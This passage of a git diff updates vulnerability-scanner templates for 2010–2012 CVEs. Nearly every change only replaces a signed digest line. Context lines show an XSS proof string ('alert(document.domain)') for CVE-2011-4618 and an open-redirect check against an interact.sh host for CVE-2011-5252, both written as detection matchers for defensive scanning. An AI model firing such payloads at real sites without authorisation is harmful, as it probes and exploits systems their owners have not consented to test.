- -# digest: 4a0a004730450220486ec692d2da17035570e1270df3c7f6ebfb8bdcb8b0cca29ecbfdc6cf9422260221008bb5001820d9bd61076abd0c025ff14b4bb49355ac20720365df0a68f9476ccf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022045161650f2c27d5b13e06cacd6e7674b0517fbaa2d1eb1d94edfde3086024912022100a4dc1136ecfc019b6d9ed4dd64eae1348048a7fde8f6de26dda94d8100b7cace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 843887872d..2e6f8f19b7 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008f039c03ab7b40ca6debfb9879560abf3e8415d3c3ac383c64efefa96b5d24d3022100be259547c372cf6090ab176e7bf3fd31755bb11b2fc81bb0f3b803264af3f54e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100eceb5f2f7cd1d7d4c964293451ad7db1caa6304e732455d765d9c75ae740aee9022100f842a1e87770a29fa134f2ab1e2b4a861f3a165fc23c2958f89bf1d8ba4426fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 04b26592a8..cd2593346a 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008e149112e1a70c96347e765c82e54768bb5e069638a3a2e7a02886a5d67d324d022051cd6dd6defb251b6ee7d5cc61a05e4de10748ba772271d2fb673a8d7de70a3f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220739ea20b7e9420b63a42b46ef9e4354ff599fd33ca68c4dad6aebd53ad2eddd6022100d61654354e8465869d28c5b62fe8004de0788fae8996ab60250f24f6a751f46a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index fdc56faeb7..01ea27188a 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022012a6493974dcd4d3173fb20abb8bef253207d11f9db34df3cbdd850ed3e8a484022100e2d794ad11406abcaa43f92d6b7fb722301d079f2a9b4f2e797c7be9d261fd1b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203d258d239c9248b152f83ca3698b1670e40544ee08c8e9966db8b11415806d85022052c897042896318c98cd2f3d26a882efddd9ab0afe0811c65efc87a0a7b55015:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index a7861fa47b..3e82aaf739 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210096514ee061d9d6fb89eed9a38d990289c1eec8725b4b3af6256fd7ce87276f830221009d09636f7c161392abab0198aa376df7dc13d1ea83ff3c024949efa576eb093b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204228b5b9b4f8ba1d91a2ea6b6b0d0be9cc665091493b3661e5707dbf837c63f602201f167a96b43e54ba0d63c21214df5265733d0591b05525bd7301e74bd144bc18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index b849dd8552..01dc51819c 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022077559225ae6fb65ca92c395c71402ae036cdfb3e7c341dedcf3f64f795b4a4550220172da3342df727597e1b3eee143ccc7fbdd692c83849dd3a7a314a10c8c30ce4:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022053a84ae5c244fc2df18c42a6eb79913c88ffdd3d798dbd4abfdd18974cdcc1530220138f2be195f4cacba94a40f95991af4932366382a4ca6b7778fc55d6a67c093e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 314a4e4465..30ae3e590d 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022022987162710bb93322e7984fc0b37bdbeb8911a22ef4bc012ea5c61558d57d7b02205043163db28a629e14449a65d25e3952d3e0f1802a9db359d8d82287a26c9ef5:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220270c341beb6e046fac04b9caab6d6c9f6f23f80c422ac49ec4f586c79eab0a8802204a37a39bd36ecd69596c7517dfb028a19febde009dddd42b43b0970d47158f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 4f4fab1cef..92c91f06b1 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100888838d9661b628a7e19f57411058958f3f5b67aa866a4ad58867f3129a0f97402210090fa21f188b628d17c2ce9dd0c9345f35a6efc1ce6699636ad7916ba78ad3de6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100af99a706bd6a892121e4aa2a4c9112208411062138463891a23f8e0bdd2b69f9022100b749225c7e119f6c0e23ff117cc21833f847923d3b4e0897d937411979327753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 71310d9d00..e698b4765f 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100caff7023373e00f3bae2149f7ec9956526ccc2c94aa0dd3632bedcd7bb5dacec0220417302e502580c845fd909340a59430bf921f8274f7fb8c81297543c753feadc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fbacaeed449d1c4eed5359f5201e1b0492b923d873d0ccd219673a6989e46ce302201076b1197a4808dc8f1a7a575a75abcc3d46bb7f13a591ad940479a1aaabc411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 84a3042c35..8944b9286c 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -40,5 +40,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 490a0046304402202c6ba8e807715f83fb3f290d6854c75176b58f47c89a8137c9e614deb4cd256f0220775710c1f085552eedf52f4636aafbd32526ba6f67606f073adec80c7a6713c4:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022016dcd81dfa3c03b176fc2abe3ccf4915761daeedaf0791684338c4d35081391302202bff49e8b18d325b524a9ac55b238dd97cde4694c34327fc00fdeb50bb434aed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 04d9d668dd..0d873eb717 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204ab62db2ec203656745195857ba01df4080e34507c25bef1d068ec82ce786653022100bcad1fa0118eaa130820c5110d1efcfc3e4f4319fc2e32798cd5f867e761a5a5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d948af8fe9f54eff8ed25afdb0e6823fa9d0a10aa0dc07ff90672197cc812bcd022100d50446dae0fd5dd50b60c2b4abaa335cd0d902147471de33530a1b01e56e1e0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index c5d530e324..f58d6d8fdd 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c323b86709ca7f68caae89cbeb7c0ad4a15f916062d2a1fa054932dce468d4a002200bfd1c33edb73ab69a0e4dc7ba7b94a6ad0cc9034005ce5cadbb80966d8ab465:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008e0282a21d86a1da7371d9b181c675339d3173bf3a77ca71820bdcacb57248f2022100c5ed4ed4514a85371cac32470e92f9d598784a483520271da2dd7340cb66c9f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 02cc2692f8..1e35db9bf6 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022008e88588ac6f5dcf35acb4424ce17b4aefd7ee4587466e7b2447e84e52601e0302202ae597b3ba4cf9b82c06daf792d2ef63308aa6a243038f24998206d64afc82f3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201a13f158db34cf7773db8c3c05f55d7ae6a029a0fde5b40dfe6b82dde56b3446022100a8037367f19888a041520a2bd60c5d5b1cc3c00af04fc7748403517d1b841842:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index c5d19eced6..c5beaa028d 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022001543a22c20dde4bb5fc2a50842b21170bb997e7867ef2192398d9a0402f7c7c022100e81825b29bcf141e70ede7ada6fa0ddbc94c4eb1e2562b410ce04532b4c39555:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b6cc538303353eb1d69de90d6e4725d0e59ebcda558583b4acaa930edc55ca8502206ab4eaa65c37da560e37a8f10e1145a47a00484146af279a65cb969f9990c9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 6c04f4ec53..7a26fe4d68 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f215674543419fa17c6138914b77170b085be567d8c09eee6e40c4d6d596034e0220577604cb183ec5533a0757461c675548466f31d018960e747811a5543f64f2c1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cd0e29f513d29759bc7e9659a9d454ee373569ad45fe597831a3791186ea86f102201488fe856d05811f65ae74b4426e87489d7dcf097af966655cbd6cfd37e908d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 0fffad2e6d..9bb1d71dbd 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220487f71369476c14b487398cea2249bec7d7201e79ec99fbff7d38f38169345ed022006fa1efc5e59c01a2f00eebc0dee9e45f39c92b301288f6d37d002fb404e6cff:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200feb604462acb5b5934cabe466ef522740bcfbb046bf02dc0e49421543745d52022100c49d106f4903735aec3fdc62d014be1208ffeea329b3b62e365021a5cb975cdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 9785b2f5da..e25258a5a0 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b7d9704a7ffeea428bab14e2310dd6f82e1f32ae21a490b67067d2ad4d56ca9a022100a9a67516b55895b85a7556f3ff9da81f419c66cf9a5004d3f5b4a969784e25a6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009f0c489a8b97a2b9be4b21577de0283a69bc7997eae1635d131c51dd58ca7b1402205d180f67f5d0120f4621161307fe03398b6a4ca561cc5d080851cd5c95674257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index f627a7a8f4..d4d17f0961 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220238538d9b30ea1f6326c2ae51c868169f4697bf67d4fb164716c84b14d6046680220784f17cb7fbfcdffef458b9af9588f6c6d22d7d6271d94b977fe409c1c6b1780:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cc38b3713392db1665d86a08e4ac9891914e04b3d69064ba9a3758c2c6203a710220046ed30f9ee1c59f067f709e6a148a8e4ebeee7248be73ec61fa487c0e7a409f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 10f1920d94..08a0cdf611 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022030d8cfd696063af884241d2d3cbf59a00fafe83b04ee6f1c24097f2c41cfee94022100fadd7733151b049e130c9a1a4acc4c7a3358d7e44b4e4decbf27cc3fdf42da76:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022033b94829500d6e8fce18d066477f6969b74452d3e513bb3a64885df686968fc4022100dd4ca9c4c654f4f460e18c42f465aade027b976b6b44450470bdc7b06809c413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index dc2bc01aef..8c6c7d3ed3 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202a2fd62dcb702b9d583b84e611e13895cd347adbfa93a82cc7f88a5d2f422de4022003e80c06482639960d6c965ecd9219e1718439282615765306a84ce3747810b3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fade7d066122033419f666784605386ca1aa6e850d49790782c78e91cef3e6cc022100d66233708586f1a6e7a3b301da999bc661629347512d23482fc83eef2aa925e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 44369ad472..aee2f19092 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200fb609be0049de4d8a00148c2d278da62560574f9bea75ebcdfb4662aea7192602210090cd2f964bbe6878ad6a25cd03695be47a8de93c9aec0b9085fe88f9cdc90431:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fc4bbd724f077d648bbb1ae79b79c82e50c4de31d9a3162bff02c0cb4919df92022100cde1348a36ec1639d6b2b9121d5528b500a14bd8cfc76769d619302ea9d45e15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 117fe17ee4..77442d560e 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100843f4c62bf7c0c1d96fab4fa94c885b117869d025af0bf60956bfe6f1f79aa3b022100be86dff5300946ce5e58d4fde4ffda5055e2b8237ce7457f28e0c5723705cd99:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b1e5505571b0c5cc9cc503e85ef3d31aeb454c6d2059f89151536995bc2d99c9022100e6f58fcc56903c5ff1061297c27e4566f4e331ffa03ae7aaf33b0693d4fbf770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index 8b03c57897..ae8d6caeb7 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100edc4c13c0918053241a04b1e1ff43f0296a78601d14c09ca10ef692a430311c7022006cd8cdaaaacfbefb75085b0804f20067ae5708f4bbc53906db5bafcc006e99a:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022009908e1e031d3eb4a1b81346a770948577a53fc2e7f5952d889796f19ab93d5a022067ad9d8f870e0fec7d1ead2dca4ad1853047a5e01793cea188b3d976ecd3a492:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 30c4720898..2bba565552 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -44,5 +44,4 @@ http: - 'contains(body_2, "</script><script>alert(document.domain)</script>")' - 'contains(body_1, "Advanced Text Widget")' condition: and - -# digest: 490a0046304402200ca9d0bff78660602c29f7ac9332fcaa0d8464ade33b73a394fdcbbaec9fc07c022034695ca1a454aff0f5e4d819e068e44eb09ebd05212abd75df9366ff09124a41:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f31a3ebcfc96acd8be213c37a05c1fe8e9c69e7ec217f17b48d1d2cbd4dbb76602210085a3e4e1fb886f32c7427121bbf22e0e2e1db81ed7892a751f1b4ce6563b35f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 64fd733b41..3923fa0145 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a65da1b9413e6eb88299f67e460046143cf97a9f4549215203a23d5b39776c7e022074c6fc14e6424700cac72ed54c63ccfbe7b7888399990039d7f3d62854100454:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204c559894ffbae099e3e1c10808e8629019535827f561f070e5c9f84ba23206660220525f3f9c5d11ccaa2ffed5e5f4cc0597efabfb03d16ab0887d1bef3b77e5ad92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index f6deef1472..2e7b2ae49b 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220589b90cb4a508079cb25d1a04ebd6ee937221886876a3f3c8a3b2fa7d00cd9c00221008e1b09a4890d7cdc075999cc72f025353dad7e0a5afecb0a34c06a2715e3434c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100da0e839ac30de58262776a4f53764500810cbdad8cfdea0c5387bd611e93ab4502201b88ef2ec3fff5151d04b89e74ca5ffcdf135f679b0f4fc6105292f1bb417f8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index c5bfc5ba14..0cbf7e6d0a 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210084392500dd77a21ca8a261709a4cd3db4f54809e49562eef701618366e07d0c3022100e100a56e6caca103476fb5e34bfc306329245d58b0bf26d54e38618a262061cc:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202628116f311e71adda6ce383e66d93edc3042127072c3022651a89881e2ec54e02204f933a5e4d25b467e782b1337ac1303a014519b253971f7f23d315c8c8164458:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 0be8b7a591..865b95a022 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100dec1d566210763865b7be733f84852d05f33e8efadd14196c5bd2626416a6e67022010d5f87b825375803e7c21c660ae73abf33b8fcd63a8844f8215eb76ebe2bd17:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100eebc83091266900f76c13098ffc1c56e40941e0bc41710dc2af513ff1a80892e022100f52d5637dcc47dca23b6c656ebcb0f2e81d9586c171fe989df52b7286fefc342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 246fb9321d..24a0973d48 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220580685bb5acfb74adae8c54f746cc6f67d8dc80fe0a005539bd27640dccb8f4d02203498deb083a7fd6c1aea2c125e5ecf2ccf17a8f37cd9bd56addb02f626ed344e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201baa1a50bbd5882123fcb3dd91a62a77e930fb2ed83b19fc14c8694e5c16777e0221009a8ae556ba328863d52653da60097b41e7e2893af157a71098a208d73d698c2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index b3f5a792a8..da92278d4e 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f2e2fed9b6415278f4890a99b1b38b6f50b56e81e36923b944739e65b2d340ed022100e4b0418d804649e00fd3292aae7446fa19b2ce43f4d39ab958574675905b90be:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d5e7808e54773df6ee8c886381b4c6e9067af8cae1c578c7c66e43d7d77aba4402210093368df9de3ff83dc3f6e531235c1c8614c68a32f987ebe858867646fe822c18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 020343650a..37c399077b 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022047e5df029accdf4bbc8d4755b4dab69b7f85ce265e5e1790d81a6b094f42a05d02204f1fca3858da3a37fc39bdd40aae2bbc21658d5f5506ecdad91fff67066da1cf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200458419bae88171ff140661a4d7ee8dfa0328109bd641a1065ca63085c7f7e2d022100cb411156db11eaa736d25cf284761f918cba2667d24ec436e528b47f2ede23f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index 91ab7efc16..908668a189 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a0047304502210080e9c3aa333a6871fb81f7a7e2cd5cb87455772dd23e30c2a5b7636aabe3b36b0220732126d61a4a27e218f6df10cfe66de2a51256b52eddbd0709d8cfc527a918c7:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200c3c0f08867ef8c62bf48e43575771466171eb241fdc429910a01600bfe22e710220733f2eeac65e7db322355217dd90314d0a8198347e3e7bcecd3f9be908b67d09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 86ae533b11..1ddc29df3b 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022004a5a7221841663bf50c6c47b22cac9a180229f69003dd014e954f646a538a3e022100c159b07a5ca4ecb5a64471620087534d5611929679988f5b0c6ac7af5a5fca1f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210099062116d3d1dcc944d2e7817fa5a514e1db3fee02a95d053f3457b3019bffd102210090805df21c74b6d0729da6b69351e9efcbafa03250440492bbce1462f6ce790a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index a859b3dbe0..196c237ac6 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207c47dfcb8c4d5c01729903a06046a94a4cf35cf1a401618a18ad048c176d7f14022100b6b298b271d2f2681034acf54469b1931fea8905789f1404344a2fe828048570:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100954c78a39cfea0856f23e21b8ea8c92b82e57d7f6b507a162ff65f76c50e2fdf02202d18f779eca83311c7b5e7a625e210b21dc907fd784d6f4d96b215a79739de15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 09c1e047da..4b665bec9f 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100dcb37ce594ca473ae393e8a064eaff68cb42558b57c5d29000acbf5c178209410220232c7ba8b78031c8462597201a2f9db62ea01a8840d47f0978c5e32a2eab1a57:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ece3b67a3e42744e02eeee1b0081aa52096b8fc3557c4ba8e65f3c66465163340220284be9351dec593c3927c2bcd0bad5b14a2c7a7abf2b4b768776d2132dc3cc76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 0b443e285c..032220a907 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d2f5e832d820b915a91f9123de4121d3baf9867bb0805cee9d56bc0ee156312d022018affd0c6e7d11361bbc878caaf7ffe7273d150b1efe80068322d584902214d4:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204380015f47601d552da361c481627432a5fe21446ee7733ac81be729a829f25a022008e7c4f9a4d268d5daf8d5ef485444510148d9da8717010571ad060a6e964156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index a520298feb..8078e98535 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fdb697a2b9ef30bb71c792262c0fcedb8422c3795379e30ca7194866252c01030221008a3a7fba200a5a329187198379086f1c30bb229c5e8c39cb29d1d5a9585887d6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c3f97673614235f67d8e93e83246375d10c18470e1d68bd3143c2847b135b3cd02210088502ead26f9158c39fa436b9314122141c7bdbf7c5d6f5d157ce2fcd6c2a6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index dcb54a7b59..08b4faf6ff 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022021339d9c7063aea047b589c179af063597a77bf69e81583ca6e1b069055cf62302205a75b64cd764e218e4658a9796cc76fe667e0d87ea7ea2ec07855500dd8d8000:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220239c91283d8a692dab3f44b8d3a611f6b05c871ed580bae7344aa9e4672534910220536261527823e46f954c779b28d249f293b614d8101c49bb5483b77a3621a924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 